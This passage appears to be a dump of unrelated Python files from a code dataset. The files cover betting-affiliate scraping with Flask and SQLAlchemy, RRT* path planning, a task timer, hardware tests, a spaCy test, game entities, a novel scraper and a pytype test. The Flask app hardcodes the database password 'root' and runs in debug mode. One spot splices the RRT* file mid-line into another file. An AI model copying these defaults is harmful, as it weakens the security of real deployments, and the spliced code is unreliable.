coral_scrapping\nfrom scrapping.eight88 import eight88_scrapping\nfrom scrapping.ladbrokes import ladbrokes_scrapping\nfrom scrapping.netbet import netbet_scrapping\nfrom scrapping.paddy import paddy_scrapping\nfrom scrapping.real import real_scrapping\nfrom scrapping.stan import stan_scrapping\n\napp = Flask(__name__)\napp.config['SQLALCHEMY_DATABASE_URI'] = 'postgresql://postgres:root@localhost/josh'\ndb = SQLAlchemy(app)\n\nclass User(db.Model):\n __tablename__ = \"users\"\n id = 
db.Column(db.Integer, primary_key=True)\n username = db.Column(db.String(80), unique = True)\n email = db.Column(db.String(120), unique=True)\n\n def __init__(self, email):\n self.email = email\n\n def __repr__(self):\n return '' % self.email\n\n\nclass Bet365(db.Model):\n __tablename__ = \"bet365s\"\n id = db.Column(db.Integer, primary_key=True)\n sports = db.Column(db.Float)\n casino = db.Column(db.Float)\n poker = db.Column(db.Float)\n games_bingo = db.Column(db.Float)\n total = db.Column(db.Float)\n withdrawal = db.Column(db.Float)\n balance = db.Column(db.Float)\n\n def __init__(self, sports, casino, poker, games_bingo, total, withdrawal, balance):\n self.sports = sports\n self.casino = casino\n self.poker = poker\n self.games_bingo = games_bingo\n self.total = total\n self.withdrawal = withdrawal\n self.balance = balance\n\n\nclass Eight88(db.Model):\n __tablename__ = \"eight88s\"\n id = db.Column(db.Integer, primary_key=True)\n impression = db.Column(db.Integer)\n click = db.Column(db.Integer)\n registration = db.Column(db.Integer)\n lead = db.Column(db.Integer)\n money_player = db.Column(db.Integer)\n balance = db.Column(db.Float)\n\n def __init__(self, impression, click, registration, lead, money_player, balance):\n self.impression = impression\n self.click = click\n self.registration = registration\n self.lead = lead\n self.money_player = money_player\n self.balance = balance\n\n\nclass Bet10(db.Model):\n __tablename__ = \"bet10s\"\n id = db.Column(db.Integer, primary_key=True)\n merchant = db.Column(db.String(80), unique = True)\n impression = db.Column(db.Integer)\n click = db.Column(db.Integer)\n registration = db.Column(db.Integer)\n new_deposit = db.Column(db.Integer)\n commission = db.Column(db.String(80))\n\n def __init__(self, merchant, impression, click, registration, new_deposit, commission):\n self.merchant = merchant\n self.impression = impression\n self.click = click\n self.registration = registration\n self.new_deposit = new_deposit\n self.commission = commission\n\n\nclass RealDeal(db.Model):\n __tablename__ = \"realDeals\"\n id = db.Column(db.Integer, primary_key=True)\n merchant = db.Column(db.String(80), unique = True)\n impression = db.Column(db.Integer)\n click = db.Column(db.Integer)\n registration = db.Column(db.Integer)\n new_deposit = db.Column(db.Integer)\n commission = db.Column(db.Float)\n\n def __init__(self, merchant, impression, click, registration, new_deposit, commission):\n self.merchant = merchant\n self.impression = impression\n self.click = click\n self.registration = registration\n self.new_deposit = new_deposit\n self.commission = commission\n\n\n\nclass LadBroke(db.Model):\n __tablename__ = \"ladBrokes\"\n id = db.Column(db.Integer, primary_key=True)\n balance = db.Column(db.String(30))\n\n def __init__(self, balance):\n self.balance = balance\n\n\nclass BetFred(db.Model):\n __tablename__ = \"betFreds\"\n id = db.Column(db.Integer, primary_key=True)\n merchant = db.Column(db.String(80), unique = True)\n impression = db.Column(db.Integer)\n click = db.Column(db.Integer)\n registration = db.Column(db.Integer)\n new_deposit = db.Column(db.Integer)\n commission = db.Column(db.String(20))\n\n def __init__(self, merchant, impression, click, registration, new_deposit, commission):\n self.merchant = merchant\n self.impression = impression\n self.click = click\n self.registration = registration\n self.new_deposit = new_deposit\n self.commission = commission\n\n\nclass Paddy(db.Model):\n __tablename__ = \"paddyies\"\n id = db.Column(db.Integer, 
primary_key=True)\n balance = db.Column(db.String(20))\n\n def __init__(self, balance):\n self.balance = balance\n\n\nclass NetBet(db.Model):\n __tablename__ = \"netBets\"\n id = db.Column(db.Integer, primary_key=True)\n balance = db.Column(db.String(20))\n\n def __init__(self, balance):\n self.balance = balance\n\n\nclass TitanBet(db.Model):\n __tablename__ = \"titanBets\"\n id = db.Column(db.Integer, primary_key=True)\n balance = db.Column(db.String(20))\n\n def __init__(self, balance):\n self.balance = balance\n\n\nclass Stan(db.Model):\n __tablename__ = \"stans\"\n id = db.Column(db.Integer, primary_key=True)\n merchant = db.Column(db.String(80), unique = True)\n impression = db.Column(db.Integer)\n click = db.Column(db.Integer)\n registration = db.Column(db.Integer)\n new_deposit = db.Column(db.Integer)\n commission = db.Column(db.String(20))\n\n def __init__(self, merchant, impression, click, registration, new_deposit, commission):\n self.merchant = merchant\n self.impression = impression\n self.click = click\n self.registration = registration\n self.new_deposit = new_deposit\n self.commission = commission\n\n\nclass Coral(db.Model):\n __tablename__ = \"corals\"\n id = db.Column(db.Integer, primary_key=True)\n merchant = db.Column(db.String(80), unique = True)\n impression = db.Column(db.Integer)\n click = db.Column(db.Integer)\n registration = db.Column(db.Integer)\n new_deposit = db.Column(db.Integer)\n commission = db.Column(db.Float)\n\n def __init__(self, merchant, impression, click, registration, new_deposit, commission):\n self.merchant = merchant\n self.impression = impression\n self.click = click\n self.registration = registration\n self.new_deposit = new_deposit\n self.commission = commission\n\n\n\n@app.route('/')\ndef dashboard():\n\treturn render_template('home.html')\n\n\n@app.route('/bet365/')\ndef bet365():\n data = db.session.query(Bet365).all()[0]\n return render_template('pages/bet365.html', data = data)\n\n\n@app.route('/eight88/')\ndef eight88():\n\tdata = db.session.query(Eight88).all()[0]\n\treturn render_template('pages/eight88.html', data = data)\n\n\n@app.route('/bet10/')\ndef bet10():\n\tdata = db.session.query(Bet10).all()[0]\n\treturn render_template('pages/bet10.html', data = data)\n\n\n@app.route('/realDeal/')\ndef realDeal():\n\tdata = db.session.query(RealDeal).all()[0]\n\treturn render_template('pages/realDeal.html', data = data)\n\n\n@app.route('/ladBroke/')\ndef ladBroke():\n\tdata = db.session.query(LadBroke).all()[0]\n\treturn render_template('pages/ladBroke.html', data = data)\n\n\n@app.route('/betFred/')\ndef betFred():\n\tdata = db.session.query(BetFred).all()[0]\n\treturn render_template('pages/betFred.html', data = data)\n\n\n@app.route('/paddy/')\ndef paddy():\n\tdata = db.session.query(Paddy).all()[0]\n\treturn render_template('pages/paddy.html', data = data)\n\n\n@app.route('/netBet/')\ndef netBet():\n\tdata = db.session.query(NetBet).all()[0]\n\treturn render_template('pages/netBet.html', data = data)\n\n\n@app.route('/titanBet/')\ndef titanBet():\n\tdata = db.session.query(TitanBet).all()[0]\n\treturn render_template('pages/titanBet.html', data = data)\n\n\n@app.route('/stan/')\ndef stan():\n\tdata = db.session.query(Stan).all()[0]\n\treturn render_template('pages/stan.html', data = data)\n\n\n@app.route('/coral/')\ndef coral():\n\tdata = db.session.query(Coral).all()[0]\n\treturn render_template('pages/coral.html', data = data)\n\n\n@app.route('/skyBet')\ndef skyBet():\n data = \"Woops, credential is not valid. 
Please provide your account info.\"\n return render_template('pages/error.html', data=data)\n\n\n@app.route('/william')\ndef william():\n data = \"Whoops, credentials are not valid. Please provide your account info.\"\n return render_template('pages/error.html', data=data)\n\n\n@app.route('/victor')\ndef victor():\n data = \"Whoops, credentials are not valid. Please provide your account info.\"\n return render_template('pages/error.html', data=data)\n\n\n@app.route('/testing/')\ndef testing():\n # # NetBet insert data starting\n # data = netbet_scrapping()\n \n # balance = data\n # result = NetBet(balance)\n # db.session.add(result)\n # db.session.commit()\n\n # Bet365 insert data starting\n data = bet365_scrapping()\n \n sports = float(data[0])\n casino = float(data[1])\n poker = float(data[2])\n games_bingo = float(data[3])\n total = float(data[4])\n withdrawal = float(data[5])\n balance = float(data[6])\n result = Bet365(sports, casino, poker, games_bingo, total, withdrawal, balance)\n\n db.session.add(result)\n db.session.commit()\n\n # Eight88 insert data starting\n data = eight88_scrapping()\n \n impression = int(data[0])\n click = int(data[1])\n registration = int(data[2])\n lead = int(data[3])\n money_player = int(data[4])\n result = Eight88(impression, click, registration, lead, money_player, 999) # 999 is a placeholder balance\n\n db.session.add(result)\n db.session.commit()\n\n # Bet10 insert data starting\n data = bet10_scrapping()\n \n merchant = str(data[0])\n impression = int(data[1])\n click = int(data[2])\n registration = int(data[3])\n new_deposit = int(data[4])\n commission = str(data[5]) # Bet10.commission is a String column\n result = Bet10(merchant, impression, click, registration, new_deposit, commission)\n\n db.session.add(result)\n db.session.commit()\n\n # RealDeal insert data starting\n data = real_scrapping()\n \n merchant = str(data[0])\n impression = int(data[1])\n click = int(data[2])\n registration = int(data[3])\n new_deposit = int(data[4])\n commission = float(data[5]) # RealDeal.commission is a Float column\n result = RealDeal(merchant, impression, click, registration, new_deposit, commission)\n\n db.session.add(result)\n db.session.commit()\n\n # Ladbrokes insert data starting\n data = ladbrokes_scrapping()\n \n balance = data\n result = LadBroke(balance)\n\n db.session.add(result)\n db.session.commit()\n\n # BetFred insert data starting\n data = betfred_scrapping()\n \n merchant = str(data[0])\n impression = int(data[1])\n click = int(data[2])\n registration = int(data[3])\n new_deposit = int(data[4])\n commission = str(data[5])\n result = BetFred(merchant, impression, click, registration, new_deposit, commission)\n\n db.session.add(result)\n db.session.commit()\n\n # Paddy insert data starting\n data = paddy_scrapping()\n \n balance = data\n result = Paddy(balance)\n\n db.session.add(result)\n db.session.commit()\n\n # TitanBet insert data starting\n data = titan_scrapping()\n \n balance = data\n result = TitanBet(balance)\n\n db.session.add(result)\n db.session.commit()\n\n # Stan insert data starting\n data = stan_scrapping()\n \n merchant = data[0]\n impression = int(data[1])\n click = int(data[2])\n registration = int(data[3])\n new_deposit = int(data[4])\n commission = data[5]\n result = Stan(merchant, impression, click, registration, new_deposit, commission)\n\n db.session.add(result)\n db.session.commit()\n\n # Coral insert data starting\n data = coral_scrapping()\n \n merchant = data[0]\n impression = int(data[1])\n click = int(data[2])\n registration = int(data[3])\n new_deposit = int(data[4])\n commission = float(data[5])\n result = Coral(merchant, impression, click, 
registration, new_deposit, commission)\n\n db.session.add(result)\n db.session.commit()\n \n return ('Thanks for your time')\n\n\nif __name__ == '__main__':\n\tapp.debug = True\n\tapp.run()","sub_path":"flaskapp.py","file_name":"flaskapp.py","file_ext":"py","file_size_in_byte":12135,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"240593711","text":"#!/usr/bin/env python\nfrom math import sqrt,pi, cos, sin, atan2\nfrom random import random\nimport matplotlib.pyplot as plt\nfrom numpy import linspace\n\nWIDTH = 150\nLENGTH = 150\nTITLE = ' RRT star'\n\ntic = 8\nobstacles=[]\nEPSILON = 10\nneighborhood = 1.75*EPSILON\n#goals = [(16.5,16.5),(16.5,49.5),(16.5,82.5),(49.5,16.5),(49.5,49.5),(49.5,82.5),(82.5,16.5),(82.5,49.5),(82.5,82.5)]\n\ngoals = [(16.5,82.5),(49.5,82.5),(82.5,82.5),(16.5,49.5),(49.5,49.5),(82.5,49.5),(16.5,16.5),(49.5,16.5),(82.5,16.5)]\n\nSTART_X,START_Y = 150,150 \nstart = [START_X,START_Y]\n\nGOAL_X, GOAL_Y = 0,50\nRADIUS = 6\nradius=18\n\n\n## Import goals\n\n# with open('goals.txt') as data:\n# for l in data:\n# x,y,r = l.split(',')\n# x,y,r = int(x), int(y), float(r)\n# goals.append([x,y,r])\n\n##Define Node Class\nclass Node:\n\n def __init__(self, x=0,y=0,parent=None):\n \n self.x = x\n self.y = y\n self.parent = parent\n\n def __str__(self):\n return '({}, {})'.format(self.x, self.y)\n\n def distance_to(self, node):\n distance = sqrt((self.x - node.x)**2 + (self.y - node.y)**2)\n return distance\n \n # def closest(self, nodes):\n # best_distance = self.distance_to(node[0])\n # best_node = node[0]\n # for node in nodes:\n # current_distance = self.distance_to(node)\n # if current_distance < best_distance:\n # best_distance = current_distance\n # best_node = node\n # print(best_node)\n # return best_node\n\n # def closest1(self, nodes):\n # distances = []\n # for node in nodes:\n # distances.append(self.distance_to(node))\n # min_distance = min(distances)\n # min_index = distances.index(min_distance)\n # return nodes[min_index]\n\n \n \n def closest2(self, nodes):\n return min(nodes, key=self.distance_to)\n\n def path_to_start(self):\n path = []\n path.append(self)\n current_node = self\n\n while current_node.parent != None:\n path.append(current_node.parent)\n current_node = current_node.parent\n return path\n def cost_to_start(self):\n path = []\n cost = 0\n path.append(self)\n current_node = self\n\n while current_node.parent != None:\n path.append(current_node.parent)\n current_node = current_node.parent\n for node in path:\n if node.parent != None:\n cost += node.distance_to(node.parent)\n return cost\n\n def cost_to_start_through_node(self,node):\n return node.cost_to_start()+self.distance_to(node)\n\n def self_cost_to_start_through_node(self,node):\n return self.cost_to_start()+self.distance_to(node)\n\n def optimal(self,nodes):\n return min(nodes, key=self.cost_to_start_through_node)\n\ndef get_goal(tic):\n if tic == 1:\n GOAL_X, GOAL_Y = goals[0]\n elif tic == 2:\n GOAL_X, GOAL_Y = goals[1]\n elif tic == 3:\n GOAL_X, GOAL_Y = goals[2]\n elif tic == 4:\n GOAL_X, GOAL_Y = goals[3]\n elif tic == 5:\n GOAL_X, GOAL_Y = goals[4]\n elif tic == 6:\n GOAL_X, GOAL_Y = goals[5]\n elif tic == 7:\n GOAL_X, GOAL_Y = goals[6]\n elif tic == 8:\n GOAL_X, GOAL_Y = goals[7]\n elif tic == 9:\n GOAL_X, GOAL_Y = goals[8]\n\n goal = [GOAL_X,GOAL_Y, RADIUS]\n return goal\n\n\ndef collision(new_node,obstacles):\n for i in range(len(obstacles)):\n dist_obs = 
sqrt(pow(new_node.x-obstacles[i][0],2)+pow(new_node.y-obstacles[i][1],2))\n if dist_obs <= radius+1: #or new_node[0] <= 0 or new_node[0] >= width or new_node[1] <= 0 or new_node[1] >= length:\n return 1\n # if newnode[0] <= 0 or newnode[0] >= width or newnode[1] <= 0 or newnode[1] >= length:\n # collision_flag = 1\n #return collision_flag\n return 0 # no obstacle within the safety radius\n\n\n\ndef setup_space(goal):\n figure, ax = plt.subplots(facecolor='white')\n ax.set_ylim((0,LENGTH))\n ax.set_xlim((0,WIDTH))\n plt.xlim()\n plt.ylim()\n plt.title(TITLE)\n ax.set_facecolor('white') # set_axis_bgcolor was deprecated and later removed from matplotlib\n start_n = plt.Circle((start[0],start[1]),1, color = 'aqua')\n goal_n = plt.Circle((goal[0],goal[1]),goal[2], color = 'green')\n ax.add_artist(start_n)\n ax.add_artist(goal_n)\n\n plot_goals = []\n for l in range(len(obstacles)):\n plot_obstacles=plt.Circle((obstacles[l][0],obstacles[l][1]),18,color='red')\n ax.add_artist(plot_obstacles) \n for k in range(len(goals)):\n plot_goals = plt.Circle((goals[k][0], goals[k][1]), 2, color='black')\n ax.add_artist(plot_goals)\n figure, plt.ion()\n return figure\n\n \ndef get_theta_node(new_node, parent):\n theta = atan2(new_node.y-parent.y,new_node.x-parent.x)\n #print('theta is{}'.format(theta))\n return Node(parent.x + EPSILON*cos(theta), parent.y + EPSILON*sin(theta))\n\ndef mapping(OldMax, OldMin, NewMax, NewMin, OldValue):\n OldRange = (OldMax - OldMin) \n NewRange = (NewMax - NewMin) \n NewValue = (((OldValue - OldMin) * NewRange) / OldRange) + NewMin\n return NewValue\n\n\ndef RRT(tic):\n ##Define Initial Parameters\n goal = get_goal(tic)\n figure = setup_space(goal)\n start_node = Node(START_X,START_Y)\n goal_node = Node(goal[0],goal[1])\n current_node = start_node\n figure, plt.plot([0,100], [33, 33], color = 'black', linewidth = 3)\n figure, plt.plot([0,100], [66, 66], color = 'black', linewidth = 3)\n figure, plt.plot([33,33], [0, 100], color = 'black', linewidth = 3)\n figure, plt.plot([66,66], [0, 100], color = 'black', linewidth = 3)\n # print('Distance to goal is {}'.format(current_node.distance_to(goal_node)))\n nodes = []\n nodes2 = []\n final_list = []\n nodes.append(start_node)\n nodes2.append(start_node)\n\n ##Setup plots\n\n #main loop\n while current_node.distance_to(goal_node) > goal[2]: \n neighbors = []\n new_node = Node(random()*WIDTH, random()*LENGTH)\n #print(new_node)\n closest_node = new_node.closest2(nodes)\n # print('distance to parent is {}'.format(new_node.distance_to(parent)))\n if new_node.distance_to(closest_node) > EPSILON:\n #print('Too Long')\n new_node = get_theta_node(new_node,closest_node)\n #print('new distance to parent is {}'.format(new_node.distance_to(parent)))\n new_node2 = new_node\n for node in nodes:\n if node.distance_to(new_node) < neighborhood:\n neighbors.append(node)\n collision_flag=0\n collision_flag=collision(new_node,obstacles)\n if(collision_flag==1):\n continue\n \n best_parent = new_node.optimal(neighbors)\n\n\n if new_node.distance_to(best_parent) > EPSILON:\n #print('Too Long')\n new_node = get_theta_node(new_node,best_parent)\n\n figure, plt.plot([new_node.x, best_parent.x], [new_node.y, best_parent.y], color = 'blue',linewidth = 1.5)\n #figure, plt.plot([new_node2.x, closest_node.x], [new_node2.y, closest_node.y], color = 'magenta',linewidth = 1, alpha = .9)\n plt.pause(0.0001)\n \n \n current_node = Node(new_node.x, new_node.y, parent = best_parent)\n current_node2 = Node(new_node2.x, new_node2.y, parent = closest_node)\n nodes.append(current_node)\n nodes2.append(current_node2)\n 
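# rewire step: reparent any neighbor whose cost back to start drops when routed through the new node\n 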
super_flag = False\n for node in neighbors:\n if node.parent != None:\n if node.cost_to_start() >= current_node.self_cost_to_start_through_node(node):\n index = nodes.index(node)\n figure, plt.plot([node.x, node.parent.x], [node.y, node.parent.y], color = 'white',linewidth = 1.51)\n nodes[index] = Node(node.x,node.y, parent = current_node)\n figure, plt.plot([new_node.x, node.x], [new_node.y, node.y], color = 'blue',linewidth = 1.5)\n half_way1=((new_node.x+node.x)/2,(new_node.y+node.y)/2)\n goal_check1=sqrt(pow(half_way1[0]-goal[0],2)+pow(half_way1[1]-goal[1],2))\n if goal_check1datetime.datetime.now():\n r_y=False\n break\n if all_y:\n continue\n if reset_r and r_y:\n #----\n try:\n if refresh:\n requests.get(refresh)\n print(\"--------------------------refresh success!------------------------\")\n except Exception as e:\n print(e)\n fin_time = datetime.datetime.now().strftime(\"%Y-%m-%d %H:%M:%S\")\n sql = \"update website set time=%s where rooturl=%s\"\n cursor.execute(sql, (fin_time, rooturl))\n con.commit()\n #----\n sql= \"update tasktimer set resetkeyword_done=1 where rooturl=%s\"\n cursor.execute(sql,rooturl)\n con.commit()\n sql = \"update tasktimer set success_done=0 where rooturl=%s\"\n cursor.execute(sql, rooturl)\n con.commit()\n sql = \"select name,id from website where rooturl=%s\"\n cursor.execute(sql, rooturl)\n reweb_result = cursor.fetchone()\n print(reweb_result)\n w_name = reweb_result[0]\n sql = \"select bz_keywords from resetkeyword where name=%s\"\n cursor.execute(sql, w_name)\n reset_result = cursor.fetchall()\n # print(reset_result)\n # new_r_list = reset_result[0][0].split(\",\")\n new_r_list = re.split(\",|,\",reset_result[0][0])\n print(new_r_list)\n # reset_list = (s for s in new_r_list)\n sql = \"select tobekeyword,id from category where websiteid=%s and tobekeyword is not null \"\n cursor.execute(sql, websiteid)\n to_result = cursor.fetchall()\n print(to_result)\n ins_k_list=[]\n for in_tk in to_result:\n sql = \"update category set tobekeyword=%s where id=%s\"\n ins_k = random.choice(new_r_list)\n if ins_k_list:\n ins_num = 1\n while ins_num:\n ins_num+=1\n if ins_num >20:\n break\n if ins_k not in ins_k_list:\n ins_num=0\n break\n ins_k = random.choice(new_r_list)\n cursor.execute(sql,(ins_k,in_tk[1]))\n con.commit()\n ins_k_list.append(ins_k)\n\nif __name__ == '__main__':\n tas_list = []\n with open(\"tasktimer.txt\", \"r\", encoding='utf8') as f:\n task_l = f.readlines()\n for i in task_l:\n new_f = i.split(\":\")\n if len(new_f)==2:\n tas_list.append(new_f[1].strip())\n # print(tas_list)\n one_host = tas_list[0]\n one_port = int(tas_list[1])\n one_user = tas_list[2]\n one_pwd = tas_list[3]\n one_db = tas_list[4]\n tow_host = tas_list[5]\n tow_port = int(tas_list[6])\n tow_user = tas_list[7]\n tow_pwd = tas_list[8]\n tow_db = tas_list[9]\n\n while True:\n t_list=FaBu(one_host,one_port,one_user,one_pwd,one_db)\n # print(t_list)\n if t_list:\n new_t_list=[]\n for i in range(len(t_list)):\n new_t_list.append(t_list[i:i+1])\n # print(new_t_list)\n lock = Lock()\n l=[]\n for n in new_t_list:\n p=Process(target=FaSuccess,args=(lock,n,one_host,one_port,one_user,one_pwd,one_db,tow_host,tow_port,tow_user,tow_pwd,tow_db))\n l.append(p)\n p.start()\n for i in l:\n i.join()\n\n\n\n","sub_path":"tasktimer.py","file_name":"tasktimer.py","file_ext":"py","file_size_in_byte":16571,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"488685392","text":"#!/usr/bin/python3\n\nimport sys\nimport runner\n\nfrom linux import 
system\n\nmodule = sys.modules[__name__]\nmodule.name = 'system'\n\nclass suspend(runner.Test):\n def __call__(self, log, *args, **kwargs):\n rtc = system.RTC('rtc0')\n rtc.set_alarm_relative(5)\n\n sys = system.System()\n sys.suspend()\n\n'''\nNote that this is merely an API test, because when this test finishes running,\nthe watchdog object will be deleted, which in turn will disable the watchdog.\nThe reason for this is that the watchdog will reboot the system if successful,\nat which point we have no way of determining whether or not it actually\nworked from this test suite.\n'''\nclass watchdog(runner.Test):\n def __call__(self, log, *args, **kwargs):\n watchdog = system.Watchdog('/dev/watchdog')\n watchdog.set_timeout(30)\n watchdog.enable()\n\nif __name__ == '__main__':\n runner.standalone(module)\n","sub_path":"tests/system.py","file_name":"system.py","file_ext":"py","file_size_in_byte":911,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"208281889","text":"# coding: utf8\nfrom __future__ import unicode_literals\n\nfrom spacy.lang.en import English\nfrom spacy.tokens import Doc\nfrom spacy.pipeline import EntityRuler, EntityRecognizer\n\n\ndef test_issue3345():\n \"\"\"Test case where preset entity crosses sentence boundary.\"\"\"\n nlp = English()\n doc = Doc(nlp.vocab, words=[\"I\", \"live\", \"in\", \"New\", \"York\"])\n doc[4].is_sent_start = True\n ruler = EntityRuler(nlp, patterns=[{\"label\": \"GPE\", \"pattern\": \"New York\"}])\n ner = EntityRecognizer(doc.vocab)\n # Add the OUT action. I wouldn't have thought this would be necessary...\n ner.moves.add_action(5, \"\")\n ner.add_label(\"GPE\")\n doc = ruler(doc)\n # Get into the state just before \"New\"\n state = ner.moves.init_batch([doc])[0]\n ner.moves.apply_transition(state, \"O\")\n ner.moves.apply_transition(state, \"O\")\n ner.moves.apply_transition(state, \"O\")\n # Check that B-GPE is valid.\n assert ner.moves.is_valid(state, \"B-GPE\")\n","sub_path":"spacy/tests/regression/test_issue3345.py","file_name":"test_issue3345.py","file_ext":"py","file_size_in_byte":954,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"196697691","text":"import os\n\nfrom app import config\nimport app.libraries.pyganim as pyganim\nfrom app.asset_manager import load_and_scale\nfrom app.db import db\nfrom app.libraries.euclid import Point3, Vector3, proj, tile_distance, trunc\nfrom app.game import dirs2, dirs3, get_direction, butts2\n\n\nclass Entity:\n def __init__(self, **kwargs):\n self.type = None\n self.world = None\n\n # Physics\n self.position3 = Point3(0, 0, 0)\n self.velocity3 = Vector3(0, 0, 0)\n\n # Movement\n self.path = []\n self.path_origin = None\n self.final_move_dest = None\n self.facing = \"down\"\n self.move_rate = config.walk_rate\n\n if \"slug\" in kwargs:\n self.slug = kwargs[\"slug\"]\n if \"position\" in kwargs:\n self.set_position(kwargs[\"position\"])\n\n @property\n def tile_pos(self):\n return proj(self.position3)\n\n @property\n def world_pos(self):\n return proj(self.path[-1]) if self.moving and self.path else proj(self.tile_pos)\n\n # Physics\n def update_physics(self, td):\n self.position3 += self.velocity3 * td\n\n def set_position(self, pos):\n self.position3.x = pos[0]\n self.position3.y = pos[1]\n\n def stop_moving(self):\n self.velocity3.x = 0\n self.velocity3.y = 0\n self.velocity3.z = 0\n\n @property\n def moving(self):\n return not self.velocity3 == (0, 0, 0)\n\n def move(self, dt):\n 
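# integrate velocity into position first, then step along the queued path waypoint by waypoint\n 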
self.update_physics(dt)\n if self.path:\n if self.path_origin:\n self.check_waypoint()\n else:\n # if path origin is not set, then a previous attempt to change\n # waypoints failed, so try again.\n self.next_waypoint()\n\n if not self.path:\n self.cancel_movement()\n\n def move_one_tile(self, direction):\n pos = self.path[0] if self.path else self.world_pos\n self.path.insert(0, trunc(pos + butts2[direction]))\n\n def next_waypoint(self):\n target = self.path[-1]\n direction = get_direction(self.tile_pos, target) if self.tile_pos != target else self.facing\n self.facing = direction\n if self.world.valid_move(self, target):\n self.path_origin = tuple(self.tile_pos)\n self.velocity3 = self.move_rate * dirs3[direction]\n else:\n # the target is blocked now\n self.stop_moving()\n self.path = []\n\n def check_waypoint(self):\n \"\"\" Check if the waypoint is reached and sets new waypoint if so.\n :return: None\n \"\"\"\n target = self.path[-1]\n expected = tile_distance(self.path_origin, target)\n traveled = tile_distance(self.tile_pos, self.path_origin)\n if traveled >= expected:\n self.set_position(target)\n self.path.pop()\n\n #self.world.end_move_out(self, self.path_origin)\n #self.world.end_move_into(self, target)\n\n self.path_origin = None\n if self.path:\n self.next_waypoint()\n\n def cancel_movement(self):\n \"\"\" Gracefully stop moving. May cause issues with world triggers.\n :return:\n \"\"\"\n if self.tile_pos == self.path_origin:\n self.abort_movement()\n elif self.path and self.moving:\n self.path = [self.path[-1]]\n else:\n self.stop_moving()\n self.cancel_path()\n\n def abort_movement(self):\n \"\"\" Stop moving, cancel paths, and reset tile position to center. May cause issues with world triggers.\n :return:\n \"\"\"\n if self.path_origin is not None:\n self.set_position(self.path_origin)\n self.stop_moving()\n self.cancel_path()\n\n def cancel_path(self):\n self.path = []\n self.path_origin = None\n\n\nclass Movable:\n wants_to_move = None\n wants_to_move_direction = None\n can_move = False\n\n\nclass UpdateInterface:\n def update(self, dt):\n pass\n\n\nclass EventInterface:\n def event(self, event):\n pass\n\n\nclass DrawInterface:\n def get_sprites(self, layer):\n state = self.get_sprite_state()\n frame = self.sprite[state]\n if isinstance(frame, pyganim.PygAnimation):\n surface = frame.getCurrentFrame()\n frame.rate = self.get_play_rate(state)\n return [(surface, self.get_tile_pos(), layer)]\n return [(frame, self.get_tile_pos(), layer)]\n\n def load_sprites(self, sprite_name=None):\n \"\"\" Load sprite graphics\n\n :return:\n \"\"\"\n self.sprite = {}\n self.moveConductor = pyganim.PygConductor()\n\n sprite_name = sprite_name if sprite_name else self.get_sprite_name()\n data = db.lookup(sprite_name, table=\"sprite_data\")\n for key, value in data[\"sprites\"].items():\n file = value['file']\n if value[\"animation\"]:\n num_frames = value['frames']\n frame_duration = value['frame_duration']\n files = [\"{}.{}.png\".format(file, str(i).rjust(3, '0')) for i in range(num_frames)]\n paths = [os.path.join(\"sprites\", file) for file in files]\n frames = [(load_and_scale(path), frame_duration) for path in paths]\n self.sprite[key] = pyganim.PygAnimation(frames, loop=True)\n self.moveConductor.add(self.sprite[key])\n\n else:\n path = os.path.join(\"sprites\", file + \".png\")\n self.sprite[key] = load_and_scale(path)\n\n self.moveConductor.play()\n\n def get_play_rate(self, state):\n return 1.0\n\n def get_sprite_state(self):\n raise NotImplementedError\n\n def 
get_tile_pos(self):\n raise NotImplementedError\n\n def get_sprite_name(self):\n raise NotImplementedError\n\nclass WallInterface:\n def valid_move(self, entity):\n raise NotImplementedError\n\n\nclass TileCollisionInterface:\n def start_move_into(self, entity):\n raise NotImplementedError\n\n def end_move_into(self, entity):\n raise NotImplementedError\n\n def start_move_out(self, entity):\n raise NotImplementedError\n\n def end_move_out(self, entity):\n raise NotImplementedError\n","sub_path":"app/win/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":6206,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"407764131","text":"# -*- coding:UTF-8 -*-\nfrom urllib import request\nfrom bs4 import BeautifulSoup\nimport pymongo\n\nif __name__ == \"__main__\":\n download_url = 'http://www.biqukan.com/1_1094/5403177.html'\n head = {}\n head['User-Agent'] = 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.99 Safari/537.36'\n download_req = request.Request(url = download_url, headers = head)\n download_response = request.urlopen(download_req)\n download_html = download_response.read().decode('gbk','ignore')\n soup_texts = BeautifulSoup(download_html, 'html.parser')\n texts = soup_texts.find_all(id = 'content', class_ = 'showtxt')\n soup_text = BeautifulSoup(str(texts), 'html.parser')\n\n content = soup_text.div.text.replace('\\xa0','')\n data = {\n 'content': content\n }\n client = pymongo.MongoClient('localhost', 27017)\n database = client['小说']\n table =database['玄幻']\n table.insert(data)","sub_path":"get-storys.py","file_name":"get-storys.py","file_ext":"py","file_size_in_byte":958,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"379110581","text":"\"\"\"Tests for matcher.py.\"\"\"\n\n\nfrom pytype import abstract\nfrom pytype import config\nfrom pytype import errors\nfrom pytype import utils\nfrom pytype import vm\n\nimport unittest\n\n\nclass MatcherTest(unittest.TestCase):\n \"\"\"Test matcher.AbstractMatcher.\"\"\"\n\n def setUp(self):\n self.vm = vm.VirtualMachine(errors.ErrorLog(), config.Options([\"\"]))\n self.type_type = abstract.get_atomic_value(self.vm.convert.type_type)\n\n def _make_class(self, name):\n return abstract.InterpreterClass(name, [], {}, None, self.vm)\n\n def _parse_and_lookup(self, src, objname, filename=None):\n if filename is None:\n filename = str(hash(src))\n with utils.Tempdir() as d:\n d.create_file(filename + \".pyi\", src)\n self.vm.options.tweak(pythonpath=[d.path])\n ast = self.vm.loader.import_name(filename)\n return ast.Lookup(filename + \".\" + objname)\n\n def _convert(self, t, as_instance):\n \"\"\"Convenience function for turning a string into an abstract value.\n\n Note that this function cannot be called more than once per test with\n the same arguments, since we hash the arguments to get a filename for\n the temporary pyi.\n\n Args:\n t: The string representation of a type.\n as_instance: Whether to convert as an instance.\n\n Returns:\n An AtomicAbstractValue.\n \"\"\"\n src = \"from typing import 